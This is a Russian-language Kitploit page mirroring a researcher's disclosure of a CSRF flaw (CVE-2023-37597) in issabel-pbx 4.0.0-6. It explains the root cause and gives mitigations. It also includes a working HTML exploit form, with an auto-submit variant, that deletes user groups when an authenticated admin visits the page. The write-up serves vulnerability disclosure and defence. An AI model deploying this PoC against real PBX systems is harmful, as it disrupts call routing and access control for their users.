Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-37597 — Issabel-pbx v 4.0.0-6 содержит уязвимость Cross-Site Request Forgery (CSRF) в функциональности управления группами пользователей. | Kitploit
Инструменты/GitHubGitHub/sahiloj/cve-2023-37597
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование
GitHubsahiloj/cve-2023-37597

CVE-2023-37597

Issabel-pbx v 4.0.0-6 содержит уязвимость Cross-Site Request Forgery (CSRF) в функциональности управления группами пользователей.

Репозиторий
116 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-37597 — issabel-pbx 4.0.0-6: Межсайтовая подделка запроса (CSRF) — Удаление группы пользователей

Отказ от ответственности: Этот репозиторий предназначен исключительно для образовательных целей и авторизованных исследований в области безопасности. Не используйте этот эксплойт против систем, которыми вы не владеете или на тестирование которых у вас нет явного письменного разрешения.


Содержание

  • Обзор
  • Детали уязвимости
  • Затронутый продукт
  • Технический анализ
  • Сценарий атаки
  • Доказательство концепции (PoC)
    • Шаги воспроизведения
    • Код эксплойта PoC
  • Воздействие
  • Смягчение и устранение
  • Хронология раскрытия
  • Ссылки
  • Автор

Обзор

issabel-pbx — широко используемая открытая платформа унифицированных коммуникаций (PBX), предоставляющая VoIP-сервисы, управление телефонией и веб-администрирование. Версия 4.0.0-6 issabel-pbx содержит уязвимость Межсайтовой подделки запроса (CSRF) в функционале управления группами пользователей.

Неаутентифицированный удалённый злоумышленник может создать вредоносную HTML-страницу, которая при посещении её аутентифицированным администратором незаметно отправляет поддельный HTTP POST-запрос на удаление любой группы пользователей. Поскольку приложение не проверяет источник изменяющих состояние запросов с помощью CSRF-токенов или политик cookie SameSite, браузер автоматически включает сессионный cookie администратора, и удаление происходит без ведома и согласия жертвы.


Детали уязвимости

ПолеЗначение
Идентификатор CVECVE-2023-37597
УязвимостьМежсайтовая подделка запроса (CSRF)
CWECWE-352 — Межсайтовая подделка запроса (CSRF)
СерьёзностьСредний
Вектор CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:H
Затронутая версияissabel-pbx 4.0.0-6
Дата раскрытия10 июля 2023
ИсследовательSahil Ojha

Затронутый продукт

ПолеЗначение
Название продуктаissabel-pbx
Версия4.0.0-6
ПроизводительIssabel Foundation
Сайт производителяhttps://www.issabel.org/
Исходный кодhttps://github.com/IssabelFoundation/issabelPBX
Протестировано наWindows (Burp Suite Community Edition)

Технический анализ

Что такое CSRF?

Межсайтовая подделка запроса (CSRF) — это атака, которая заставляет браузер жертвы отправлять аутентифицированный запрос целевому приложению от имени злоумышленника. Атака успешна, когда:

  1. У жертвы есть активная аутентифицированная сессия с целевым приложением.
  2. Приложение полагается исключительно на сессионные cookie для аутентификации запросов (т.е. отсутствует CSRF-токен, нет проверки Origin/Referer, нет атрибута cookie SameSite=Strict или SameSite=Lax).
  3. Злоумышленник может предсказать структуру изменяющего состояние запроса.

Корневая причина

Конечная точка удаления группы пользователей (/index.php?menu=grouplist) в issabel-pbx 4.0.0-6 обрабатывает HTTP POST-запросы, содержащие только действие delete и параметр id_user. Приложение не:

  • Не генерирует и не проверяет синхронизирующий (анти-CSRF) токен.
  • Не проверяет HTTP-заголовки Origin или Referer.
  • Не устанавливает атрибут SameSite для сессионных cookie.

В результате любая веб-страница, загруженная в браузере жертвы, может незаметно отправить форму удаления, используя существующую сессию жертвы, поскольку браузер автоматически прикрепит сессионный cookie.

Уязвимая конечная точка

root@kitploit:~
POST /index.php?menu=grouplist HTTP/1.1
Host: <Issabel IP>

delete=Delete&id_user=<USER_GROUP_ID>

Сценарий атаки

  1. Злоумышленник создаёт вредоносную HTML-страницу со скрытой формой, которая отправляет POST-запрос на удаление в панель администратора Issabel.
  2. Злоумышленник доставляет страницу аутентифицированному администратору Issabel — через фишинговое письмо, ссылку в чате или встроенный `` на скомпрометированной странице.
  3. Браузер жертвы загружает страницу. JavaScript автоматически отправляет форму, либо жертву с помощью социальной инженерии вынуждают нажать поддельную кнопку «Отправить».
  4. Сервер Issabel получает валидный POST-запрос с сессионным cookie администратора и удаляет целевую группу пользователей без дополнительного подтверждения или проверки токена.
  5. Группа пользователей удаляется навсегда, что потенциально нарушает маршрутизацию вызовов, контроль доступа и работу всех пользователей, зависевших от этой группы, — фактически вызывая отказ в обслуживании на уровне приложения.

Доказательство концепции (PoC)

Предупреждение: Приведённый PoC предоставлен строго в образовательных целях. Используйте его только в лабораторных средах или в системах, на тестирование которых у вас есть явное разрешение.

Шаги воспроизведения

Шаг 1 — Войдите в панель администратора Issabel

Перейдите на страницу списка групп пользователей и войдите с правами администратора.

root@kitploit:~
https://{Issabel IP}/index.php?menu=grouplist&action=view&id=11

Панель администратора — список групп пользователей


Шаг 2 — Перехватите запрос на удаление

Попробуйте удалить группу пользователей, пропуская трафик через Burp Suite. Щёлкните правой кнопкой мыши по перехваченному POST-запросу и выберите Engagement Tools → Generate CSRF PoC, чтобы сгенерировать HTML-заготовку эксплойта.

Burp Suite — перехваченный запрос DELETE


Шаг 3 — Разместите страницу эксплойта CSRF

Сохраните сгенерированный HTML как файл (см. Код эксплойта PoC ниже). Разместите его на сервере, контролируемом злоумышленником, или отправьте его напрямую жертве.


Шаг 4 — Жертва открывает страницу эксплойта

Когда аутентифицированный администратор открывает URL эксплойта или его перенаправляет на него, скрытая форма отправляется автоматически (или жертва нажимает кнопку-приманку). Целевая группа пользователей удаляется из панели администратора.

Эксплойт отправлен — группа удалена (до)

Эксплойт отправлен — группа удалена (после)


Код эксплойта PoC

Следующий HTML-файл (также доступен как CSRF exploit.html) демонстрирует атаку. Замените {Issabel IP} на целевой хост и измените id_user на идентификатор группы, которую вы хотите удалить.

root@kitploit:~
<html>
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://{Issabel IP}/index.php?menu=grouplist" method="POST">
      <input type="hidden" name="delete" value="Delete" />
      <input type="hidden" name="id_user" value="7" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Вариант с автоматической отправкой: Чтобы жертве не приходилось ничего нажимать, добавьте следующее внутри тега <body>, чтобы форма отправлялась автоматически при загрузке страницы:

root@kitploit:~
<script>document.forms[0].submit();</script>

Воздействие

АспектОписание
ЦелостностьЗлоумышленник может незаметно удалить любую группу пользователей из панели администратора Issabel.
ДоступностьУдаление групп пользователей нарушает правила маршрутизации вызовов, контроль доступа и телефонию для всех пользователей, входящих в эти группы, что по сути является частичным отказом в обслуживании.
КонфиденциальностьНапрямую данной уязвимостью не затрагивается.

Смягчение и устранение

Администраторам и разработчикам следует применить следующие меры защиты:

  1. Внедрите CSRF-токены (паттерн синхронизирующего токена)

    • Генерируйте уникальный, непредсказуемый, привязанный к сессии (или к запросу) токен для каждой формы, изменяющей состояние.
    • Проверяйте токен на стороне сервера перед обработкой любых операций POST/PUT/DELETE.
  2. Установите атрибут cookie SameSite

    • Устанавливайте сессионные cookie с атрибутом SameSite=Lax (минимум) или SameSite=Strict, чтобы предотвратить передачу учётных данных сессии в межсайтовых запросах.
    • Пример заголовка ответа: Set-Cookie: PHPSESSID=...; SameSite=Lax; Secure; HttpOnly
  3. Проверяйте заголовки Origin и Referer

    • На стороне сервера отклоняйте запросы, в которых заголовок Origin или Referer не соответствует домену самого приложения.
  4. Требуйте повторную аутентификацию для деструктивных действий

    • Запрашивайте у администратора подтверждение пароля перед удалением групп или выполнением других деструктивных операций.
  5. Применяйте эшелонированную защиту (Defense-in-Depth)

    • Используйте правило Web Application Firewall (WAF) для блокировки неожиданных межсайтовых POST-запросов к чувствительным конечным точкам.

Хронология раскрытия

ДатаСобытие
10 июля 2023Уязвимость обнаружена и задокументирована Sahil Ojha
10 июля 2023Присвоен CVE-2023-37597
10 июля 2023Публичное раскрытие

Ссылки

  • NVD — CVE-2023-37597
  • OWASP — Межсайтовая подделка запроса (CSRF)
  • Шпаргалка OWASP по предотвращению CSRF
  • CWE-352: Межсайтовая подделка запроса (CSRF)
  • Issabel Foundation — issabelPBX

Автор

Sahil Ojha Исследователь безопасности

Если вы нашли это исследование полезным, не стесняйтесь поставить ⭐ репозиторию.

Скачать инструмент